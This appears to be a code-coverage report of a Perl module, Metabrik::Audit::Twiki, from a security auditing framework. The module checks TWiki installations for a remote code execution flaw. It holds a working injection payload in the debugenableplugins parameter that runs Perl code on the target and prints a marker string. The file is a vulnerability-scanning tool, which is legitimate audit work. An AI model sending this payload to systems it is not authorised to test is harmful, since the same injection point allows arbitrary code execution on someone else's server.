line |
stmt |
bran |
cond |
sub |
pod |
time |
code |
1
|
|
|
|
|
|
|
# |
2
|
|
|
|
|
|
|
# $Id$ |
3
|
|
|
|
|
|
|
# |
4
|
|
|
|
|
|
|
# audit::twiki Brik |
5
|
|
|
|
|
|
|
# |
6
|
|
|
|
|
|
|
package Metabrik::Audit::Twiki; |
7
|
1
|
|
|
1
|
|
628
|
use strict; |
|
1
|
|
|
|
|
2
|
|
|
1
|
|
|
|
|
28
|
|
8
|
1
|
|
|
1
|
|
5
|
use warnings; |
|
1
|
|
|
|
|
3
|
|
|
1
|
|
|
|
|
28
|
|
9
|
|
|
|
|
|
|
|
10
|
1
|
|
|
1
|
|
5
|
use base qw(Metabrik::Client::Www); |
|
1
|
|
|
|
|
2
|
|
|
1
|
|
|
|
|
451
|
|
11
|
|
|
|
|
|
|
|
12
|
|
|
|
|
|
|
sub brik_properties { |
13
|
|
|
|
|
|
|
return { |
14
|
0
|
|
|
0
|
1
|
|
revision => '$Revision$', |
15
|
|
|
|
|
|
|
tags => [ qw(unstable) ], |
16
|
|
|
|
|
|
|
author => 'GomoR ', |
17
|
|
|
|
|
|
|
license => 'http://opensource.org/licenses/BSD-3-Clause', |
18
|
|
|
|
|
|
|
attributes => { |
19
|
|
|
|
|
|
|
target => [ qw(uri) ], |
20
|
|
|
|
|
|
|
url_paths => [ qw($path_list) ], |
21
|
|
|
|
|
|
|
}, |
22
|
|
|
|
|
|
|
attributes_default => { |
23
|
|
|
|
|
|
|
target => 'http://localhost/', |
24
|
|
|
|
|
|
|
url_paths => [ '/' ], |
25
|
|
|
|
|
|
|
}, |
26
|
|
|
|
|
|
|
commands => { |
27
|
|
|
|
|
|
|
debugenableplugins_rce => [ qw(target|OPTIONAL url_path_list|OPTIONAL) ], |
28
|
|
|
|
|
|
|
}, |
29
|
|
|
|
|
|
|
}; |
30
|
|
|
|
|
|
|
} |
31
|
|
|
|
|
|
|
|
32
|
|
|
|
|
|
|
sub debugenableplugins_rce { |
33
|
0
|
|
|
0
|
0
|
|
my $self = shift; |
34
|
0
|
|
|
|
|
|
my ($target, $url_paths) = @_; |
35
|
|
|
|
|
|
|
|
36
|
0
|
|
0
|
|
|
|
$target ||= $self->target; |
37
|
0
|
|
0
|
|
|
|
$url_paths ||= $self->url_paths; |
38
|
0
|
0
|
|
|
|
|
$self->brik_help_run_undef_arg('debugenableplugins_rce', $target) or return; |
39
|
0
|
0
|
|
|
|
|
$self->brik_help_run_undef_arg('debugenableplugins_rce', $url_paths) or return; |
40
|
0
|
0
|
|
|
|
|
$self->brik_help_run_undef_arg('debugenableplugins_rce', $url_paths, 'ARRAY') or return; |
41
|
|
|
|
|
|
|
|
42
|
0
|
|
|
|
|
|
my $exploit = '?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html'. |
43
|
|
|
|
|
|
|
"\r\n\r\n".'Vulnerable TWiki Instance")%3bexit'; |
44
|
|
|
|
|
|
|
|
45
|
0
|
|
|
|
|
|
$target =~ s/\/*$//; |
46
|
|
|
|
|
|
|
|
47
|
0
|
|
|
|
|
|
for my $url_path (@$url_paths) { |
48
|
0
|
|
|
|
|
|
$url_path =~ s/^\/*//; |
49
|
|
|
|
|
|
|
|
50
|
0
|
|
|
|
|
|
my @users = (); |
51
|
|
|
|
|
|
|
|
52
|
0
|
|
|
|
|
|
my $url = $target.'/'.$url_path.$exploit; |
53
|
|
|
|
|
|
|
|
54
|
0
|
|
|
|
|
|
$self->log->verbose("debugenableplugins_rce: testing url: [$url]"); |
55
|
|
|
|
|
|
|
|
56
|
0
|
0
|
|
|
|
|
my $r = $self->get($url) or next; |
57
|
0
|
0
|
|
|
|
|
if ($r->{code} == 200) { |
58
|
0
|
|
|
|
|
|
my $decoded = $r->{content}; |
59
|
0
|
|
|
|
|
|
$self->log->verbose($decoded); |
60
|
0
|
0
|
|
|
|
|
if ($decoded =~ /Vulnerable TWiki Instance/i) { |
61
|
0
|
|
|
|
|
|
$self->log->info("Vulnerable"); |
62
|
|
|
|
|
|
|
} |
63
|
|
|
|
|
|
|
else { |
64
|
0
|
|
|
|
|
|
$self->log->info("Not vulnerable?"); |
65
|
|
|
|
|
|
|
} |
66
|
|
|
|
|
|
|
} |
67
|
|
|
|
|
|
|
} |
68
|
|
|
|
|
|
|
|
69
|
0
|
|
|
|
|
|
return 1; |
70
|
|
|
|
|
|
|
} |
71
|
|
|
|
|
|
|
|
72
|
|
|
|
|
|
|
1; |
73
|
|
|
|
|
|
|
|
74
|
|
|
|
|
|
|
__END__ |